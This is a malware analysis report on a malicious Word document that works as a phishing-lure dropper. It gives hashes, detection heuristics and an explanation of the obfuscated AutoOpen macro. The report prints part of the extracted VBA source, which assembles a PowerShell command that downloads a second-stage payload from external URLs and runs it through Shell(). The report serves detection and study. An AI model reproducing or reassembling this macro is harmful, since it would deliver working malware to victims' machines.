Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0161d8de95529992…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 179.5 KB
Created: 2017-12-07 13:01:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08
MD5: ee93bac6fe532fe5a0d7a0cbced06144
SHA-1: 668699d357172d228f99718d57e233f9dc8ae206
SHA-256: 0161d8de95529992eb38621ec048bb7cbc1ce25d014a0ddbc1024cd73bba188d
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Word document whose VBA project contains an AutoOpen entry point. Most of the macro body is decoy code: assignments of Array(UCase("…" + "…")) built from random letters that are never used. The working statements are Mid() calls that cut fragments of a PowerShell command out of longer junk strings. The visible fragments contain DownloadFile, $env:public (with the pbI token standing for $, as in pbIenv:public and pbIfranc.DownloadFile), [CHAr] arithmetic, and a chain of .rEPLACe() calls that map placeholder tokens back to real characters (for example jAu to [CHAr]39, the single quote, so that tUQ+tUQ becomes a '+' concatenation seam). Once reassembled, the command downloads a second-stage payload from one of the URLs split across the fragments and executes it; the Shell() call flagged below is how the macro launches it. The ClamAV name Img.Dropper.PhishingLure-6443153-0 classifies the document as a phishing-lure dropper.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro calls Shell(), i.e. it spawns an external process; together with the AutoOpen entry point this is the execution path for the assembled PowerShell command.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The macro has an AutoOpen procedure, which Word runs as soon as the document is opened with macros enabled, so no user action beyond enabling content is needed.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents and documents whose source extraction failed, where no visible source is available.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample the description is generic heuristic text: the VBA project was recovered (see OLE_VBA_MACROS and the extracted macros.bas below), so the marker adds nothing beyond the AutoOpen finding.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://jAu+jAugjAu  In document text (OLE body)
      Not a real host: jAu is one of the macro's placeholder tokens for the quote character, so this is an undecoded fragment of the obfuscated command.
    • http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
      Benign DrawingML XML namespace, present in any document with embedded drawing markup.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 70107 bytes
SHA-256: 5aa979bb0e74debdde88614ac149f5d1d530b3bcf633e511fe2c7d4d4bdcf81c

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "kLGoXvSbYq"
Function GroQSZEWTizL()
LGrHVCp = Array(UCase("RnmCZjZna" + "wnAadaJVzj" + "vNNvDFuZ" + "HERnIsTfRuY" + "AFSwRjrZcZzjH"), UCase("aZGWifNvRu" + "MSkHiEDLWu" + "uzlZCACi" + "ifmSuYv" + "saFnYcFNH"))
vUNtVMJREuK = Mid("U5DW5UQ+t'+'UQctUQ+tUQ.ctUQ+tUQotU'+'Q+tUQm/GtUQ+tUQdety3tUQ+tUQ6jAu+jAu,htttUQ+'+'tUQp://42tUQ+tUQ0entUQ+tUQt.com/GdtUQ+tUQety36,htUQ+tUQttp:tUQ+tUQ/tUQ+tUQ/tUQ+tUQfbl.t'+'U'+'2PibP9porpfuLSZIJw8sWUisu", 6, 172)
JQwnjBzQdtl = Array(UCase("ZThdaMap" + "iTllUIRNU" + "HACTbpv" + "ruTtGtKWkLNKXQ" + "amoSEPJYHijcI"), UCase("AFniRjvwoN" + "awXGAJjqNbhmW" + "ihVMPZQCzkGZj" + "hrizbbd" + "lSGUzlvvS"))
PUpdi = Array(UCase("zUtXkbSiJ" + "EcNsjnnjjSMF" + "nSwpUWUj" + "viFNMLuK" + "PPLLQNMEkpYhoF"), UCase("MGEolzIoDthin" + "bclVSwpwcC" + "dPliIdGcNBGG" + "YBHbIRj" + "YiJNmMWICPdC"))
CQkaa = Array(UCase("waakIOpAKYm" + "iGTHwMjsYjvmUd" + "akDtXWnrw" + "QVlhJAzGMkjEj" + "FNqGPinP"), UCase("APQHiPbvOVQ" + "qwKOjwjHtiV" + "uoJfjbU" + "BqkSttS" + "loVjScOOjsjfH"))
EnqtAq = Mid("vM8wAl9TTQbsH1O0SaNKciFhS4lWrTFDB6+tUQc in tUQ+tUQpbItUQ+tUQbcdtUQ+tUQ'+')tUQ+tUQ{ttUQ+tUQry{pbIfranc'+'.DowjAu'+'+jAunloadFile(t'+'UQ+tUQptUQ+tUQbIabc.TtUQ+tUQ'+'oString(tUQ+tUQ), tUQ+tUQptUQ+tUQbIhuas)tUQ+tUQ;InvotUQ+tUQke-ItUQ+tUQFwoa", 35, 199)
dWcDkiSji = Array(UCase("IhWKuPa" + "aUUVfwQ" + "OoKTzEjcRWRkT" + "ldEzQUkQ" + "CIfwOorGQ"), UCase("TnbSiGE" + "utXzqjP" + "rRjjwEzaIKTF" + "oZQBizXKK" + "tLSqXqERwi"))
jiXodonZNw = Array(UCase("lVtPMqFv" + "mANiANrUm" + "oWEJmiSauzo" + "ovtEPYihclpai" + "EwNBoXzzSlhL"), UCase("htPKwauM" + "lwzSqFDDh" + "bEdTMtKRvoc" + "XESwnMbs" + "nVmNRDVjrwPECj"))
qorsCkNVpf = Array(UCase("ZVjjuhUvDu" + "ZStDmIAnWKd" + "bVITZOPwiOHN" + "HMiPKwz" + "ctYYRWfkwNLvn"), UCase("OlOujnz" + "KLfzivVYMLdtzc" + "vHskMlAwRQDw" + "BPRMqjiNsRrkO" + "BzRtFlBTno"))
ziAWiUQCHaz = Mid("sNbmzHO).rEPLACe(([CHAr]103+[CHAr]73+[CHAr]85),[String][CHAr]36).rEPLACe('UuJ','|').rEPLACe('jAu',[String][CHAr]39))TmDGHEL3a", 8, 109)
sHSEhmj = Array(UCase("EaCRmJz" + "pdYtAuRqbp" + "oiqGvqolDsN" + "UUQsNKK" + "qnzzjsJ"), UCase("maFnPYvTNT" + "awYwfcaE" + "kBEjRjoAlt" + "DjTwdmZnwZ" + "iuDjHSrRUInkkk"))
zvzXriU = Array(UCase("lKJPOjb" + "cXwuRCTtXCqBAz" + "zwzXwMri" + "dJFVYwiiQnm" + "FFAqlri"), UCase("wnDozKSOM" + "klpTRIzzVZY" + "kNLLtrzh" + "UNRfpGQX" + "fPWnCBMln"))
OaKlNMv = Array(UCase("iUFIFBYsWHP" + "tCURHUNLoiZQfD" + "jSpDBoBmtmt" + "CtiiPLOlF" + "NrKdBqEup"), UCase("CZoahENFrQb" + "OCLRJwJERRW" + "EzsYnKhwz" + "QcFDALwJt" + "qidISjhHlkLkC"))
KPvapO = Mid("FW'+'ReFEREnCe)[1,3]+tjAu+jAuUQxtUQ-JOIntUQtUQ)jAu'+').'+'replacE(jAutUQjAu,[sTring][chAR]39).replacE(([chAR]107+[c'+'h'+'AR]88+[chAR]54),jAuUuJjAu).replacE(jAuArqjAu,[sTring][chAR]36))'J1NlAWhh2jbSuRzIGaAc", 3, 184)
aACoW = Array(UCase("snWFroCqdmQaO" + "PPXXnbChaHt" + "lzKKwHEH" + "ZwHarnQnkzEAr" + "mdpwMqLNPL"), UCase("CEfSoIWHqqRQ" + "womtpKoHuZXhJJ" + "QdLjwroikVwoh" + "BjUNsBXDSXEWa" + "fIliziqM"))
INNzt = Array(UCase("WjLoRhichz" + "iMFvzGHXibVU" + "FEdaMNFfZihR" + "JsMGNBj" + "kWbLniDMUv"), UCase("ObjNEIP" + "rGIiXizwPL" + "NUoNUhBOZjC" + "FmhCYaiIz" + "hoQbrDhphoAsif"))
CzYjoAQTGO = Array(UCase("zVmnuQz" + "CfzWVcwlHiaIo" + "JWRorUMbGZt" + "JfDMSIKpJuFif" + "EBCYBqMVLPWFY"), UCase("fbYadjSQhuL" + "zwUPRnJBP" + "YiYCcnUo" + "NjfJiWiAzXnTI" + "jsNAwziv"))
UDitu = Mid("D7WlY6cAbbTrX+tUQhtUQ+tUQutUQ+tUQastUQ+tUQ = pbIetUQ+tUQntUQ+tUQv:publitjAu+jAuUQ+tUQctUQ+tUQ +'+' tUQ+tUQaToaDCAsADpLC9lWqADu2z8nIwK", 14, 94)
oXUHQuw = Array(UCase("OOfCuqlomDs" + "cZWkDiPmzwtpz" + "jBNSMEBbKLzF" + "HwAiYzN" + "QLDzNSs"), UCase("RVpENGjaTqn" + "APKlzbIqzSVqj" + "TpKUwlJAspJ" + "pAMZKhL" + "EBASAmKCbz"))
uFcViDfj = Array(UCase("PVCpCbDiwt" + "wiRpmsn" + "KibrPWoJPnYq" + "RMQofjcZ" + "srZENAaYODKwls"), UCase("dmTNRnrYDvhVB" + "GMKMOlk" + "LIojrYUjL" + "TcKsMOIHBTW" + "jiY
... (truncated)